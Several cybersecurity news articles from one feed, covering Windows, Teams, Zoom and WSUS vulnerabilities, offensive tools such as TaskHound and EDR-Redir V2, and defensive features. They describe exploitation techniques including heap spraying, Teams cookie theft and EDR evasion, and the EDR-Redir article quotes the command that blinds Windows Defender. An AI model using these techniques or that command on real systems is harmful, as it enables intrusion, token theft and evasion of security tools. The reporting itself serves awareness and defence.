With a CVSS score of 9.8, this vulnerability poses a severe threat to Windows users worldwide, as it requires no user interaction for exploitation.

Discovered in May 2025 and patched by Microsoft on August 12, 2025, the issue stems from an untrusted pointer dereference in the windowscodecs.dll library, affecting core image processing functions.​

Attackers can embed the malicious JPEG in everyday files like Microsoft Office documents, enabling silent compromise when the file is opened or previewed.

This flaw highlights ongoing risks in legacy graphics handling, where seemingly innocuous image decoding can result in a complete system takeover. As Windows powers billions of devices, unpatched systems remain highly exposed to phishing campaigns or drive-by downloads.​

Zscaler ThreatLabz identified the vulnerability through targeted fuzzing of the Windows Imaging Component, focusing on JPEG encoding and decoding paths in windowscodecs.dll.

The entry point for exploitation lies in the GpReadOnlyMemoryStream::InitFile function, where manipulated buffer sizes allow attackers to control memory snapshots during file mapping.

Fuzzing revealed a crash triggered by dereferencing an uninitialized pointer at jpeg_finish_compress+0xcc, exposing user-controllable data via heap spraying.​

Stack traces from WinDbg analysis pointed to key functions like CJpegTurboFrameEncode::HrWriteSource and CFrameEncodeBase::WriteSource, confirming the flaw in JPEG metadata encoding processes.

This uninitialized resource issue enables arbitrary code execution without privileges, making it exploitable over networks. Microsoft confirmed the vulnerability affects automatic image rendering in applications reliant on the Graphics Component.​

Affected Versions and Patching

The vulnerability impacts recent Windows releases, particularly those using vulnerable builds of windowscodecs.dll. Organizations must prioritize updates to mitigate risks, as exploitation could chain with other attacks for lateral movement in networks.

Exploitation Mechanics and Proof-of-Concept

Exploiting CVE-2025-50165 involves crafting a JPEG that triggers the pointer dereference during decoding, often via embedded files in Office or third-party apps.

For 64-bit systems, attackers bypass Control Flow Guard using Return-Oriented Programming (ROP) chains in sprayed heap chunks of size 0x3ef7. This pivots execution by creating read-write-execute memory with VirtualAlloc and loading shellcode for persistent access.​

Zscaler’s proof-of-concept demonstrates heap manipulation through an example app that allocates, frees, and processes Base64-encoded JPEGs, achieving RIP control.

While no in-the-wild exploits have been reported, the low complexity and wide network reach make it a prime target for ransomware or espionage. CFG is disabled by default in 32-bit versions, easing attacks on older setups.​

Users should immediately apply the August 2025 Patch Tuesday updates via Windows Update, targeting high-value assets first. Disable automatic image previews in email clients and enforce sandboxing for untrusted files. Zscaler has implemented cloud-based protections to block exploit attempts.​

This incident underscores the perils of unpatched graphics libraries in enterprise environments, where JPEGs are ubiquitous in workflows.

As threat actors evolve tactics, timely patching remains the strongest defense against such pixel-perfect poisons. With no observed active exploitation yet, proactive measures can prevent widespread damage.​

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Critical Windows Graphics Vulnerability Lets Hackers Seize Control with a Single Image appeared first on Cyber Security News.

Starting next year, Windows 11 and Windows Server 2025 will include System Monitor (Sysmon) capabilities, transforming how security teams detect threats and investigate incidents.

For years, Sysmon has been the go-to tool for IT administrators, security professionals, and threat hunters seeking deep visibility into Windows systems.

However, deploying and maintaining it across thousands of endpoints has been cumbersome, requiring manual downloads, consistent updates, and operational overhead that introduces security risks when updates lag.

The native integration solves these critical pain points. Security teams gain instant threat visibility with the same rich functionality, custom configuration files, and automated compliance through standard Windows Update.

Most importantly, organizations now receive official customer service support, eliminating the risks associated with unsupported production environments.

Sysmon in Windows delivers granular diagnostic data that powers advanced threat detection and technical investigation.

Security applications can access these events through Windows Event Logs (Applications and Services Logs / Microsoft/Windows/Sysmon/Operational) or feed directly into SIEM systems.

Key detection events include process creation monitoring to identify suspicious command-line activity. Network connection tracking to flag Command and Control (C2) traffic, and process access detection to expose credential dumping attempts.

The tool also identifies file creation in suspicious locations, detects tampering techniques such as process hollowing, and captures WMI persistence mechanisms.

Enabling Sysmon functionality is straightforward. Administrators can activate it using the Turn Windows Features On/Off feature, then install it with a single command: sysmon -i.

This command installs the driver, starts the service immediately, and applies the default configuration, with no separate tooling required.

Microsoft plans to expand capabilities further, including enterprise-scale management and AI-powered inferencing.

Imagine automatically detecting credential theft or lateral movement patterns with edge AI, dramatically reducing dwell time and improving organizational resilience.

This native integration represents a significant shift in how Windows handles security monitoring, combining OS-level signals with automated updates to build more resilient, secure-by-design systems.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Sysmon – Go-to Tool for IT Admins, Security Pros, and Threat Hunters Coming to Windows appeared first on Cyber Security News.

The tool automatically discovers tasks running with privileged accounts and stored credentials, making it a valuable addition to security assessments.

What Makes TaskHound Different?

TaskHound stands out by automating the discovery of dangerous scheduled tasks across Windows networks.

Instead of manually searching through system logs, the tool scans remote machines over SMB and parses task XML files to identify security weaknesses.

It looks for tasks running as administrative accounts, privileged users, or Tier 0 accounts, typically the highest-value targets for attackers.

The tool integrates with BloodHound, a popular network security visualization platform.

This integration enables security teams to automatically correlate scheduled tasks with BloodHound’s attack path data, revealing which tasks pose the most significant risk in their environment.

TaskHound includes several powerful features for threat hunters. It automatically detects tasks assigned to Tier 0 users, such as Domain Admins and Enterprise Admins.

The tool analyzes when credentials were last changed compared to when tasks were created, helping identify old passwords that could be vulnerable to offline cracking.

The platform supports both modern BloodHound Community Edition and legacy BloodHound formats, making it compatible with existing security infrastructure.

TaskHound can also work offline, analyzing previously collected XML files without requiring direct network access.

For operators using AdaptixC2, the tool includes a Beacon Object File implementation. During a penetration test, TaskHound quickly identifies exploitation opportunities.

Tasks running under compromised accounts can be manipulated to gain system access.

The tool provides detailed reporting showing task locations, associated credentials, creation dates, and recommended next steps for each finding.

The creator emphasizes strict OPSEC (operational security) considerations. Since the tool relies on standard SMB operations, network defenders could detect its activity.

For sensitive assessments, users can employ the standalone BOF version or manually collect tasks for offline analysis.

The project roadmap includes a direct BloodHound database connector and a dedicated NetExec module to expand integration with other popular security frameworks.

The GitHub developer also plans automated credential extraction for offline decryption.

TaskHound fills an essential gap in Windows privilege-escalation assessment, automating a tedious manual process while providing actionable intelligence to security teams protecting enterprise networks.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post TaskHound Tool – Detects Windows Scheduled Tasks Running with Elevated Privileges and Stored Credentials appeared first on Cyber Security News.

This feature, launched on November 10, 2025, empowers admins and analysts to respond to email threats more swiftly without requiring policy modifications.​

The new actions Submit to Microsoft, add entries to the Tenant Allow/Block List, and Initiate Automated Investigation—were previously limited to the Threat Explorer tool but are now integrated into Advanced Hunting.

This allows for programmatic threat hunting using custom Kusto Query Language (KQL) queries, streamlining workflows for security operations centers (SOCs).

By bringing these tools together, Microsoft addresses customer feedback, reducing the time needed to triage and remediate malicious emails.​

Microsoft Defender for O365

Advanced Hunting, part of Microsoft Defender XDR, already provides deep visibility into cross-domain threats across email, endpoints, and identities. With this update, users can select query results and trigger responses contextually based on message delivery status, such as purging from inboxes or quarantines.

For bulk selections exceeding 100 messages, options like email purge and proposed remediations remain available, ensuring scalability for large-scale incidents. Threat Explorer continues to operate independently, providing complementary views of real-time detections.​

This rollout affects admins and security analysts leveraging Microsoft Defender XDR, with actions enabled by default across worldwide tenants.

No user interface removal is possible, but existing administrative policies, including role-based access control (RBAC), are fully respected to maintain compliance. Organizations can scope access via the Microsoft 365 Defender portal under Settings > Permissions > Roles, preventing unauthorized use.​

To prepare, teams should audit current hunting queries and integrate the new actions into playbooks for automated responses. Communicating these changes to SOC stakeholders and providing targeted training will minimize disruptions.

For instance, updating documentation on initiating automated investigations can accelerate adoption, especially in environments handling high volumes of phishing or malware-laden emails.​

The enhancement aligns with broader trends in automated investigation and response (AIR) in Defender for O365 Plan 2, where remediation clusters around malicious files or URLs for faster threat neutralization.

By default, AIR actions require approval, but configurations for auto-remediation on message clusters can further reduce manual overhead, though clusters over 10,000 items prompt reviews. In Advanced Hunting schemas like EmailPostDeliveryEvents, auto-remediated items appear with ActionType “Automated Remediation” and ActionTrigger “Automation,” aiding forensic analysis.​

This update maintains proactive defense in an era of sophisticated email-based attacks, such as ransomware and business email compromise.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Microsoft Defender for O365 New Feature Allows Security Teams to Trigger Automated Investigations appeared first on Cyber Security News.

The flaw, tracked as CVE-2025-64740, has been assigned a high severity rating with a CVSS score of 7.5, according to Zoom’s security bulletin ZSB-25042.

The vulnerability stems from improper verification of cryptographic signatures in the Zoom Workplace VDI Client for Windows installer.

This weakness can be exploited by an authenticated user with local access to escalate their privileges on the system.

Zoom Workplace for Windows Vulnerability

When successfully exploited, attackers could gain higher-level permissions, potentially executing unauthorized commands, accessing sensitive data, or compromising system integrity.

The security flaw affects Zoom Workplace VDI Client for Windows versions before 6.3.14, 6.4.12, and 6.5.10 in their respective tracks.

While the vulnerability requires local access and user interaction, making it somewhat complex to exploit, the potential impact remains significant.

The CVSS vector string indicates it can affect confidentiality, integrity, and availability of the compromised system.

Privilege escalation vulnerabilities are particularly concerning in enterprise environments where Zoom is widely deployed for remote work and virtual desktop infrastructure.

Attackers who already have limited access to a system could exploit this flaw to gain administrative rights, bypass security controls, and potentially move laterally across networks to compromise additional resources.

The improper cryptographic signature verification means the installer cannot properly validate whether the software being installed is legitimate or has been corrupted.

This creates an opportunity for threat actors to manipulate the installation process and inject malicious code with elevated permissions.

Zoom has released security updates to address this vulnerability and strongly recommends that all users update their Zoom Workplace VDI Client for Windows immediately.

Organizations using affected versions should prioritize patching to mitigate the risk of exploitation. Users can download the latest secure versions from Zoom’s official download page at zoom.us/download.

System administrators should verify that all installations across their organization are updated to versions 6.3.14, 6.4.12, 6.5.10, or later, depending on their deployment track.

This disclosure underscores the importance of maintaining up-to-date software, especially for widely used communication platforms in enterprise settings.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Zoom Workplace for Windows Vulnerability Allow Users to Escalate Privilege appeared first on Cyber Security News.

The company is actively investigating the problem, which affects select client versions of Windows and primarily impacts Intel-based systems supporting Connected Standby. This power-saving feature keeps devices networked during low-energy states.

While the issue does not compromise data security, it could disrupt user workflows by requiring a one-time entry of the BitLocker recovery key upon restart.

According to Microsoft’s Windows release health documentation, affected users may encounter the recovery prompt during boot-up or restarts following the updates.

Once the key is provided, the device should resume normal operation without further interruptions. This rollback to recovery mode stems from interactions between the updates and BitLocker’s encryption mechanisms, though Microsoft has not detailed the exact root cause yet.

The advisory emphasizes that no server editions are impacted, limiting the scope to consumer and enterprise client environments.

Affected Versions and Update Details

The issue targets three key client platforms: Windows 11 version 25H2 and 24H2, both tied to originating knowledge base article KB5066835, and Windows 10 version 22H2 under KB5066791.

Users can reference Microsoft’s issue trackers such as WI1183025 for Windows 11 25H2, WI1183026 for 24H2, and WI1183027 for Windows 10 22H2 via the Windows Release Health portal for the latest status.

These updates, rolled out to patch critical vulnerabilities and enhance system stability, inadvertently triggered the BitLocker behavior on compatible hardware.

Intel processors with Connected Standby support appear most vulnerable, as the feature’s network persistence may conflict with post-update boot processes.

Microsoft recommends that affected organizations apply a Known Issue Rollback (KIR) to sidestep the problem. This mitigation tool, detailed in the company’s IT Pro blog, requires contacting Microsoft Support for Business to deploy organization-wide.

Individual users should ensure they have their BitLocker recovery keys handy typically stored in Microsoft accounts or printed during setup—to avoid extended downtime.

In the interim, Microsoft urges caution before applying the October updates on impacted devices, suggesting a pause for non-urgent systems.

The company promises updates as the investigation progresses, with a focus on a permanent fix in future patches. Cybersecurity experts advise proactively backing up recovery keys, especially for enterprise fleets that rely on BitLocker for compliance.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Microsoft Warns Windows Systems May Enter BitLocker Recovery After October 2025 Updates appeared first on Cyber Security News.

The update, designated as KB5067036, is causing Task Manager to continue running in the background even after users close the application. This issue has been officially acknowledged by Microsoft as a known problem in the latest optional update.

The KB5067036 update is part of Microsoft’s routine maintenance releases designed to improve functionality, performance, and reliability across Windows 11 systems.

This particular update falls under the category of optional non-security preview releases, which are typically made available during the fourth week of each month.

These updates allow users to receive new features and improvements ahead of the mandatory security updates that roll out on the second Tuesday of every month, commonly known as Patch Tuesday.

What the Update Brings to Windows 11

The update includes various improvements to AI components for Copilot Plus PC experiences, with enhanced versions of Image Search, Content Extraction, Semantic Analysis, and Settings Model.

Additionally, it contains a servicing stack update designated as KB5067035, which ensures that devices can properly receive and install future Windows updates. The servicing stack is a critical component that maintains the reliability and robustness of the Windows update system.

According to Microsoft’s official documentation, Task Manager may continue operating in the background after users attempt to close the application.

This behavior represents a disruption from normal functionality, where closing Task Manager should completely terminate the process.

The issue affects both Windows 11 version 24H2 and the newer 25H2 release, indicating that the problem spans multiple current Windows versions.

Task Manager is a crucial system utility that allows users to monitor running applications, track system performance, manage startup programs, and terminate unresponsive processes.

Having it continue running in the background could potentially consume system resources unnecessarily and may cause confusion for users who expect the application to fully close when dismissed.

The KB5067036 update is available through Windows Update as an optional download. Users can access it by navigating to Start, then Settings, followed by Update and Security, and finally Windows Update.

The update appears in the Optional Updates Available section, where users can choose to download and install it. For users who install the update and encounter issues, Microsoft has provided removal instructions.

However, there is an important limitation: while the cumulative update can be removed using the DISM command-line tool with the Remove-Package option, the servicing stack update cannot be removed once installed.

Users cannot use the Windows Update Standalone Installer with the uninstall switch on the combined package, as this method will not work for packages that include servicing stack updates.

Microsoft continues to monitor feedback and typically addresses known issues in subsequent updates. Users experiencing the Task Manager problem may want to wait for a resolution before installing this optional update.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Windows 11 24H2/25H2 Update Causes Task Manager to be Active After Closure appeared first on Cyber Security News.

This development builds on recent findings that expose how Teams stores sensitive access tokens, potentially allowing attackers to impersonate users and access chats, emails, and documents.

The tool, released by Tier Zero Security, adapts an existing browser exploitation technique to bypass Teams’ file-locking mechanisms, raising fresh concerns about endpoint security in enterprise environments.

The innovation stems from a detailed analysis of Teams’ authentication process. As outlined in a recent research post by RandoriSec, Microsoft Teams embeds a browser window using the msedgewebview2.exe process, a Chromium-based component that handles login via Microsoft’s online services.

During authentication, this process writes cookies to a SQLite database in a manner similar to traditional web browsers.

These cookies contain access tokens that grant entry to Teams conversations, Skype features, and even the Microsoft Graph API for broader Office 365 interactions.

However, modern Chromium browsers have bolstered their defenses. They now protect encryption keys through a COM-based IElevator service that runs with SYSTEM privileges, verifying the caller’s legitimacy by checking the executable’s secure installation path.

This setup demands either execution within the browser process or elevated administrator access to decrypt cookie values.

In contrast, Teams relies on the simpler Data Protection API (DPAPI) tied to the current user’s master key, making its cookies comparatively easier to target once the encryption key is obtained.

Overcoming File Locks With Process Injection

A key hurdle in the original research was Teams’ runtime behavior: the application locks its Cookies database file while running, even in the background, preventing direct reads or copies.

Killing the MS-Teams.exe process, as suggested in the post, would alert users and trigger security monitoring.

To address this, the researchers drew inspiration from the Cookie-Monster-BOF, an open-source tool that extracts cookies from live browser processes by duplicating file handles and invoking the IElevator service.

The new Teams-Cookies-BOF repurposes this logic for the messaging app. Instead of terminating Teams, it runs directly within the ms-teams.exe process, potentially via DLL or COM hijacking, to identify child webview processes holding open handles to the Cookies file.

It duplicates these handles, reads the file contents on the fly, and decrypts the values using the user’s DPAPI master key. This approach ensures stealth, as the tool mimics legitimate process activity without file system disruptions.

Notably, the BOF’s flexibility extends beyond Teams injection. It can execute in any process sharing the same user privileges, querying webview children across the system to download relevant cookies.

While this broadens its applicability, it also introduces detectable indicators, such as unusual handle operations on unrelated processes.

For demonstration, the researchers shared a Gist script that achieves similar results from a neutral context, though it risks pulling non-Teams cookies as collateral.

Implications For Red Teamers And Defenders

The decryption mechanism mirrors Cookie-Monster-BOF exactly, employing AES-256-GCM after extracting the nonce and encrypted payload from the “v10”-tagged values in the database.

Once obtained, the tokens enable API calls to fetch conversation histories, read messages, or send phishing content on behalf of victims, escalating risks in lateral movement or social engineering campaigns.

Tier Zero Security has made the BOF publicly available on GitHub, compatible with any C2 framework supporting Beacon payloads, and it requires no arguments for basic use.

This release underscores a persistent gap in Teams’ security model compared to hardened browsers. Organizations should prioritize behavioral monitoring for process injection, enforce least-privilege execution, and consider endpoint detection rules targeting DPAPI accesses or webview handle manipulations.

As hybrid work relies heavily on Teams, such vulnerabilities highlight the need for ongoing scrutiny of embedded browser components in productivity apps.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post New BOF Tool Exploits Microsoft Teams’ Cookie Encryption Allowing Attackers to Access User Chats appeared first on Cyber Security News.

According to the researcher TwoSevenOneT, the version targets the parent directories of EDR installations, such as Program Files, to create redirection loops that blind security software without disrupting legitimate applications.

Previously, EDR-Redir used direct folder redirections, but protections often blocked those attempts; V2 circumvents this by looping subfolders back to themselves while isolating the EDR’s path for manipulation.​

The tool builds on Windows’ bind link feature, introduced in Windows 11 24H2, which allows filesystem namespace redirection via the bindflt.sys driver without kernel privileges.

EDR solutions like antivirus programs typically lock down their subfolders in locations such as Program Files or ProgramData to prevent tampering, but they cannot fully restrict writes to parent directories without breaking system installations.

EDR-Redir V2 queries all subfolders in the target parent, like Program Files, and mirrors them in a controlled directory, such as C:\TMP\TEMPDIR. It then establishes bidirectional bind links between these mirrors and originals, forming loops that maintain normal access for non-EDR software.

The EDR’s specific subfolder, such as Windows Defender’s in C:\ProgramData\Microsoft, is excluded from the loop and redirected solely to the attacker’s TEMPDIR.

This setup enables DLL hijacking or file drops in the redirected space, tricking the EDR into loading malicious components. Developers often overlook such parent-level redirections, potentially affecting a wide range of EDRs.​

EDR-Redir V2 on Windows Defender

In a demonstration on Windows 11, TwoSevenOneT applied EDR-Redir V2 against Windows Defender, located in C:\ProgramData\Microsoft\Windows Defender.

The tool was executed with parameters specifying the target folder, redirection destination, and exception path: EDR-Redir.exe C:\ProgramData\Microsoft c:\TMP\TEMPDIR “C:\ProgramData\Microsoft\Windows Defender”.

Console output detailed the bind link creations, confirming success without errors. Post-execution, Defender’s access attempts looped through TEMPDIR, effectively blinding it to its original files and allowing potential evasion tactics.

A visualization showed the redirection in action, with Defender viewing TEMPDIR as its operational parent. The GitHub repository for EDR-Redir provides the tool for download and further testing. A demo video on YouTube illustrates the process in real-time.​

This technique highlights vulnerabilities in how EDRs protect against filesystem manipulations at the parent level, rendering folder-specific safeguards ineffective. Attackers could disable EDR services or inject code, operating undetected in user mode with minimal events.

While no widespread exploits are reported yet, the method’s simplicity raises concerns for enterprise environments. Defenders should monitor bind link usage in critical directories like Program Files and implement integrity checks on EDR paths.

EDR vendors may need to enhance protections for parent folders without impeding usability. TwoSevenOneT shares ongoing research on X (@TwoSevenOneT) for pentesting insights. As evasion tools evolve, proactive monitoring of kernel filters remains essential.​

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post New EDR-Redir V2 Blinds Windows Defender on Windows 11 With Fake Program Files appeared first on Cyber Security News.

The vulnerability, tracked as CVE-2025-59287, was patched by Microsoft on October 14, 2025, but attackers quickly began abusing it after proof-of-concept code became publicly available on GitHub.

Sophos telemetry indicates that exploitation began on October 24, 2025, just hours after technical analysis and exploit code were released online.

The threat actors targeted internet-facing WSUS servers in universities, technology companies, manufacturing firms, and healthcare organizations, primarily based in the United States.

While Sophos has confirmed six incidents so far, security experts believe the actual number of compromised organizations is significantly higher.

How the Attacks Unfold

The exploitation leverages a critical deserialization bug in WSUS that allows unauthenticated remote code execution. When attackers target vulnerable servers, they inject Base64-encoded PowerShell commands through nested command processes running under IIS worker privileges.

The malicious script executes silently on compromised systems, gathering valuable intelligence about targeted organizations.

The harvested data includes external IP addresses and ports of vulnerable hosts, enumerated lists of Active Directory domain users, and detailed network interface configurations. This information is then exfiltrated to webhook.site URLs controlled by the attackers.

Sophos researchers discovered four unique webhook.site URLs associated with the attacks, with three linked to the platform’s free service tier.

By analyzing the request logs on two publicly accessible URLs, researchers observed that exploitation began at 02:53 UTC on October 24 and reached the maximum threshold of 100 requests by 11:32 UTC the same day.

The rapid exploitation of this vulnerability demonstrates how quickly threat actors move to weaponize newly disclosed flaws.

The indiscriminate nature of the attacks suggests cybercriminals are scanning for exposed WSUS servers on the internet and exploiting them opportunistically rather than targeting specific organizations.

According to Rafe Pilling, Director of Threat Intelligence at Sophos, “This activity shows that threat actors moved quickly to exploit this critical vulnerability in WSUS to collect valuable data from vulnerable organizations.”

The stolen data could be used for reconnaissance, follow-up attacks, or sold to other malicious actors on underground marketplaces. Organizations running WSUS services should immediately apply Microsoft’s security patches and conduct thorough reviews of their network configurations.

 Additionally, companies should identify any WSUS server interfaces exposed to the internet and restrict access to WSUS ports 8530 and 8531 only to systems that genuinely require connectivity.

Security teams should review logs for signs of exploitation and implement network segmentation to prevent lateral movement if compromises are discovered.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Hackers Exploiting Windows Server Update Services Flaw to Steal Sensitive Data from Organizations appeared first on Cyber Security News.